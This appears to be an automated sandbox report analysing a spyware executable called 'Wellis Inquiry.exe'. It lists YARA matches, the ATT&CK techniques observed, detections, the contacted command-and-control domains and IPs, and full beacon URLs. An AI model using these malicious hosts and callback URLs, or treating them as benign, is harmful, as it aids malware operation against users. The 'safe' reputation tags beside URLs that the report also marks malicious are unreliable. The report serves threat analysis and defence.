Source: Yara match	File source: 0.2.Wellis Inquiry.exe.446c2a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Wellis Inquiry.exe	9%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.Wellis Inquiry.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/a-e	0%	URL Reputation	safe
http://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/G	0%	URL Reputation	safe
http://www.aceserial.xyz/ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.carterandcone.com/	0%	Avira URL Cloud	safe
http://www.typography.net4?	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.carterandcone.comw.m	0%	Avira URL Cloud	safe
http://www.typography.net	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/i	0%	Avira URL Cloud	safe
www.psychedeliccosmetics.com/ag9v/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.carterandcone.comtal	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/(	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sakkal.comd	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/tu	0%	Avira URL Cloud	safe
http://www.carterandcone.comf	0%	URL Reputation	safe
http://www.tiro.comy	0%	URL Reputation	safe
http://www.typography.netrz	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://www.fontbureau.comion	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y03	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/r	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://en.wikip	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.typography.neth?	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.psychedeliccosmetics.com/ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_	0%	Avira URL Cloud	safe
http://www.sakkal.com3	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/ita	0%	Avira URL Cloud	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/i	0%	URL Reputation	safe
http://www.typography.netiv	0%	Avira URL Cloud	safe
http://www.ovmfinacial.com/ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_	0%	Avira URL Cloud	safe
http://www.tiro.com51	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
psychedeliccosmetics.com	34.102.136.180	true	false	unknown
aceserial.xyz	151.106.117.36	true	true	unknown
www.marunouchi1.com	183.90.240.3	true	true	unknown
www.ovmfinacial.com	199.59.242.153	true	true	unknown
parkingpage.namecheap.com	198.54.117.210	true	false	high
www.ebookgratis.online	104.21.2.218	true	true	unknown
shops.myshopify.com	23.227.38.74	true	true	unknown
www.richartware.com	unknown	unknown	true	unknown
www.blackmagiccomics.com	unknown	unknown	true	unknown
www.psychedeliccosmetics.com	unknown	unknown	true	unknown
www.dollpartyla.com	unknown	unknown	true	unknown
www.aceserial.xyz	unknown	unknown	true	unknown
www.quickcarehomeopathic.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_	true	Avira URL Cloud: safe	unknown
http://www.aceserial.xyz/ag9v/?9rq=8aghxAEFV3UFLmLUmwXrjnry4I8PGHpXxFVOvh2n7b9U9R7NlIya57CFUx9pJqwzlAw7&BFQ=5jI0jhMHA0hx_	true	Avira URL Cloud: safe	unknown
www.psychedeliccosmetics.com/ag9v/	true	Avira URL Cloud: safe	low
http://www.psychedeliccosmetics.com/ag9v/?9rq=B7neoLnMPG5T4Lq1mgXXW304ryc0TDTB8h8f/WhOEZEEcWgrsd/ecy8wgWRxVB11aSvz&BFQ=5jI0jhMHA0hx_	false	Avira URL Cloud: safe	unknown
http://www.ovmfinacial.com/ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/a-e	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/G	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.tiro.com	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com/	Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.net4?	Wellis Inquiry.exe, 00000000.00000003.655882162.000000000634B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.collada.org/2005/11/COLLADASchema9Done	Wellis Inquiry.exe, 00000000.00000002.673404245.00000000081A0000.00000004.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comw.m	Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.net	Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/i	Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.ascendercorp.com/typedesigners.html	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comtal	Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/(	Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	Wellis Inquiry.exe, 00000000.00000003.656690322.000000000633A000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.comd	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/tu	Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comf	Wellis Inquiry.exe, 00000000.00000003.658175918.000000000633C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://bitninja.io	cmmon32.exe, 0000000B.00000002.923291558.0000000004D62000.00000004.00020000.sdmp	false		high
http://www.tiro.comy	Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netrz	Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/G	Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comion	Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Y03	Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/r	Wellis Inquiry.exe, 00000000.00000003.658906835.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://en.wikip	Wellis Inquiry.exe, 00000000.00000003.655430474.0000000006353000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.neth?	Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.sakkal.com3	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp, Wellis Inquiry.exe, 00000000.00000003.659071283.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/ita	Wellis Inquiry.exe, 00000000.00000003.659186250.0000000006334000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.como	Wellis Inquiry.exe, 00000000.00000002.672511476.0000000006330000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/i	Wellis Inquiry.exe, 00000000.00000003.658754582.0000000006334000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Wellis Inquiry.exe, 00000000.00000002.672668487.0000000007542000.00000004.00000001.sdmp	false		high
http://www.typography.netiv	Wellis Inquiry.exe, 00000000.00000003.655923750.000000000634B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com51	Wellis Inquiry.exe, 00000000.00000003.656404711.000000000634B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
199.59.242.153	www.ovmfinacial.com	United States	395082	BODIS-NJUS	true
183.90.240.3	www.marunouchi1.com	Japan	9371	SAKURA-CSAKURAInternetIncJP	true
151.106.117.36	aceserial.xyz	Germany	61157	PLUSSERVER-ASN1DE	true
34.102.136.180	psychedeliccosmetics.com	United States	15169	GOOGLEUS	false
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
104.21.2.218	www.ebookgratis.online	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502627
Start date:	14.10.2021
Start time:	07:27:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Wellis Inquiry.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@9/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.3% (good quality ratio 13.1%) Quality average: 73.4% Quality standard deviation: 30.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 85 Number of non-executed functions: 157
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.50.102.62, 95.100.218.79, 104.94.89.6, 51.11.168.232, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.82.210.154 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:28:29	API Interceptor	1x Sleep call for process: Wellis Inquiry.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
199.59.242.153	010013.exe	Get hash	malicious	Browse	www.lifestyleeve.com/o4ms/?X61HiLc=8GNZfXhxkQPDp/0Q3wwiQDJ4fZPKroBOtzHsTvHuSmq05FSo/HrWX19J684oFY+7hHWk&jHPhl=5jo4ZxbHw
	XaTgTJhfol.exe	Get hash	malicious	Browse	www.gafoodstamps.com/mexq/?v2JP=aujtepI6qRwt4NWlDzxdhSPeB9mp7HwM3P6GccjuQrHNTxqttOPLCNBNcH4bMoCm5uRW&GZ_=4h-TkZ9hp8gh-
	6pa7yRpcFt.exe	Get hash	malicious	Browse	www.myverizonbillpay.com/hr8n/?f0DDp6RH=ILCQys4W2nmI16PHUn3vKB7/UprAS8tji7H+tefUzZaDXaBN/QiF2o4GX0UFNMprHqhN&8pNLu=7nGt2pBPBx
	Emask230921doc.exe	Get hash	malicious	Browse	www.newyroklifeannuities.com/x9r4/?7n0=R48xY&c2Jp7Bc0=lcZHIyAd6OHv52M4P4oACjlfZtfJGnVbGUlMndCBdmn5tcdEwHSZ2MqsoIPmB/a4+IEQ
	Invoice Packing list.exe	Get hash	malicious	Browse	www.vspfotme.com/eods/?6liXpZH=EJMYTlsbPcKMchoi/NCYrSOUkQ1lcyycXKbirIJaFNH/FpU7Xng2HIBKTdIWJb6tzkCK&EBPLR=cVnDMB4H0pL
	D8043D746DC108AC0966B502B68DDEABA575E841EDFA2.exe	Get hash	malicious	Browse	ww1.survey-smiles.com/
	Productivity.exe	Get hash	malicious	Browse	ww1.thefreesmsapp.com/_tr
	Productivity.exe	Get hash	malicious	Browse	ww1.thefreesmsapp.com/_tr
	kIWGxQYKYO.exe	Get hash	malicious	Browse	www.burgettflorist.com/scb0/?3fS4=GgI5Mtow8RWwVkMKBQaBMThn8Kn2le3rEGwIGwauHSmKVNxcFOKD/koJDpRpHIi9Dc2a2cTcbQ==&s4UxHb=VdWhLdXhd8SL8l
	PO 1,5001993 21118.exe	Get hash	malicious	Browse	www.shose8.com/ergs/?3fH8bR=WRNiM0MNR83AvUgJMfCXzTGXaLsU3JZqni9ehjpnFXkT45BJtbNl1RpkrODexH0A0JoG&nX=xFQHHbDxAfpTC
	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Get hash	malicious	Browse	ww1.survey-smiles.com/
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	www.anodynemedicalmassage.com/euzn/?G0Ddo=u178RPbEoFHNEMSTYSAKyFLEc68kuAf3hAv/2v3T+vkoQ4nsSSLkzGkhPsJYzpfotw78F7bWTQ==&2dod=HL3Tzluhwhvxcp
	SQLPLUS.EXE	Get hash	malicious	Browse	ww1.weirden.com/
	TNT 07833955.exe	Get hash	malicious	Browse	www.tenncreative.com/b5ce/?C2M=Rg3TsdfntIiWJKNWRmLTqgm5mB7Gwns4ujDsoW9GSorZA7LMeCjIS06nAIZUc2zUa+VgrpSNrw==&2dtd=2dTpyPZX3Tqt_8d0
	LogJhhPPyK.exe	Get hash	malicious	Browse	www.mammutphilippines.com/n90q/?-ZYT=GiWrvS/99XrV+2Uf6Zy/o5YW6c6VukN0OHlBSCCHHBiFQpS9xb5cjKCaQXfJL9Q9t00b&IZsH=3fjpWpD0JdD
	PO.exe	Get hash	malicious	Browse	www.rejddit.com/ig04/?0DH8qx3=3h/Tr838qcHUz18OOMqR99bs8cT2OrpSq2e3FqStS3xcK7WNKLX9gCPVSXRmyxeIco6krjPjWg==&jL3=-ZrdqHw
	D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe	Get hash	malicious	Browse	ww4.onlygoodman.com/
	pay.exe	Get hash	malicious	Browse	www.salartfinance.com/t75f/?V6yLxzHh=lAZRvM4hLFtTWseMMjmTcl+RZcUPNrURFXAml9hw9i0ZHFoSyWAXJ/sXcd8B+Vv3Doaf&bX=AdotnVi0RxtDfRqP
	DOC.exe	Get hash	malicious	Browse	www.camham.co.uk/imm8/?oZBd28E8=JSfa42tBaq4a3YeMfphPE2TCUHWdSJf7Yy7nyCnDPKehtAvkSRQbSxaf+1hgIsLr6SVj&7n6hj=p2MtFfu8w4Y
	RFQ.Order 0128-44.exe	Get hash	malicious	Browse	www.glatt.store/5afm/?0FQ0vvt=JMGrtXIs8RtMHth06d94tZTj42tDCsOeVWPwlq/2m+LWjBoF9Wmh8X/iRtktzTq0TwDw&nP=PtUdq8l

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	REQUIREMENT.exe	Get hash	malicious	Browse	198.54.117.210
	ORD2021100866752371AC.exe	Get hash	malicious	Browse	198.54.117.217
	Scan_34668000.exe	Get hash	malicious	Browse	198.54.117.217
	Angebot Anfrage Maschinensucher YOM.exe	Get hash	malicious	Browse	198.54.117.218
	vk5MXd2Rxm.msi	Get hash	malicious	Browse	198.54.117.217
	orde443123.exe	Get hash	malicious	Browse	198.54.117.216
	DHL Shipment Notification 74683783.exe	Get hash	malicious	Browse	198.54.117.210
	vbc.exe	Get hash	malicious	Browse	198.54.117.218
	KYTransactionServer.exe	Get hash	malicious	Browse	198.54.117.215
	doc_0862413890.exe	Get hash	malicious	Browse	198.54.117.218
	PO08485.xlsx	Get hash	malicious	Browse	198.54.117.212
	vURlUPQLT0.exe	Get hash	malicious	Browse	198.54.117.211
	n0jr7NLyU1.exe	Get hash	malicious	Browse	198.54.117.218
	EFghz5ZtCS.exe	Get hash	malicious	Browse	198.54.117.218
	1cG7fOkPjS.exe	Get hash	malicious	Browse	198.54.117.216
	SOA 2021.exe	Get hash	malicious	Browse	198.54.117.215
	etiyrfIKft.exe	Get hash	malicious	Browse	198.54.117.217
	115-209.doc	Get hash	malicious	Browse	198.54.117.210
	s0JV4f4mDk.exe	Get hash	malicious	Browse	198.54.117.210
	obizx.exe	Get hash	malicious	Browse	198.54.117.212
shops.myshopify.com	divpCHa0h7.exe	Get hash	malicious	Browse	23.227.38.74
	pago atrasado.exe	Get hash	malicious	Browse	23.227.38.74
	xHSUX1VjKN.exe	Get hash	malicious	Browse	23.227.38.74
	dtMT5xGa54.exe	Get hash	malicious	Browse	23.227.38.74
	New Order For Chile.xlsx	Get hash	malicious	Browse	23.227.38.74
	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse	23.227.38.74
	REQ2021102862448032073.exe	Get hash	malicious	Browse	23.227.38.74
	XaTgTJhfol.exe	Get hash	malicious	Browse	23.227.38.74
	vk5MXd2Rxm.msi	Get hash	malicious	Browse	23.227.38.74
	pKD3j672HL.exe	Get hash	malicious	Browse	23.227.38.74
	2KW3KamMqq.exe	Get hash	malicious	Browse	23.227.38.74
	HP8voO5Ikv.exe	Get hash	malicious	Browse	23.227.38.74
	DHLAWB 191021.xlsx	Get hash	malicious	Browse	23.227.38.74
	KYTransactionServer.exe	Get hash	malicious	Browse	23.227.38.74
	103 Ref 2853801324189923.exe	Get hash	malicious	Browse	23.227.38.74
	doc_0862413890.exe	Get hash	malicious	Browse	23.227.38.74
	1cG7fOkPjS.exe	Get hash	malicious	Browse	23.227.38.74
	549TXoJm6p.exe	Get hash	malicious	Browse	23.227.38.74
	famz10.doc	Get hash	malicious	Browse	23.227.38.74
	5Zebq6UNKC.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SAKURA-CSAKURAInternetIncJP	IYn5yyW2Fx	Get hash	malicious	Browse	160.27.18.218
	Ah46Wx4m5W	Get hash	malicious	Browse	49.212.179.77
	1cG7fOkPjS.exe	Get hash	malicious	Browse	183.181.96.79
	etiyrfIKft.exe	Get hash	malicious	Browse	183.181.96.120
	MV ROCKET_PDA.exe	Get hash	malicious	Browse	183.181.96.79
	Lv9eznkydx.exe	Get hash	malicious	Browse	120.136.10.95
	ATT32481.html	Get hash	malicious	Browse	210.188.201.169
